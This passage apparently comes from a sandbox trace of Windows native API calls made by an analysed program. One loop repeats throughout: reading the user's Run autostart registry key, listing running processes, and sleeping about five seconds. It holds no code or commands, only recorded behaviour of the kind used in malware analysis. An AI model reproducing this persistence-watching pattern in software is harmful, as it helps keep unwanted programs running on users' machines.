ResultLength=0x0) returned 0x0 [0177.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.051] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.063] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.063] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.063] NtClose (Handle=0x154) returned 0x0 [0177.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.079] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.079] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.079] NtClose (Handle=0x154) returned 0x0 [0177.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.083] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.162] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.162] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.162] NtClose (Handle=0x154) returned 0x0 [0177.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.166] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.172] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.173] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.173] NtClose (Handle=0x154) returned 0x0 [0177.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.177] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.203] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.203] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.203] NtClose (Handle=0x154) returned 0x0 [0177.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.208] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.217] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.217] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.217] NtClose (Handle=0x154) returned 0x0 [0177.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.221] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.232] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.232] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.232] NtClose (Handle=0x154) returned 0x0 [0177.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.237] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.248] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.248] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.248] NtClose (Handle=0x154) returned 0x0 [0177.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.252] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.263] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.263] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.263] NtClose (Handle=0x154) returned 0x0 [0177.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.268] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.280] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.280] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.280] NtClose (Handle=0x154) returned 0x0 [0177.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.284] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.294] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.295] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.295] NtClose (Handle=0x154) returned 0x0 [0177.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.299] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.310] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.310] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.310] NtClose (Handle=0x154) returned 0x0 [0177.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.326] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.326] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0177.326] NtClose (Handle=0x154) returned 0x0 [0177.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0177.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0177.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0177.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0177.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0177.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0177.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0177.368] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0177.369] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 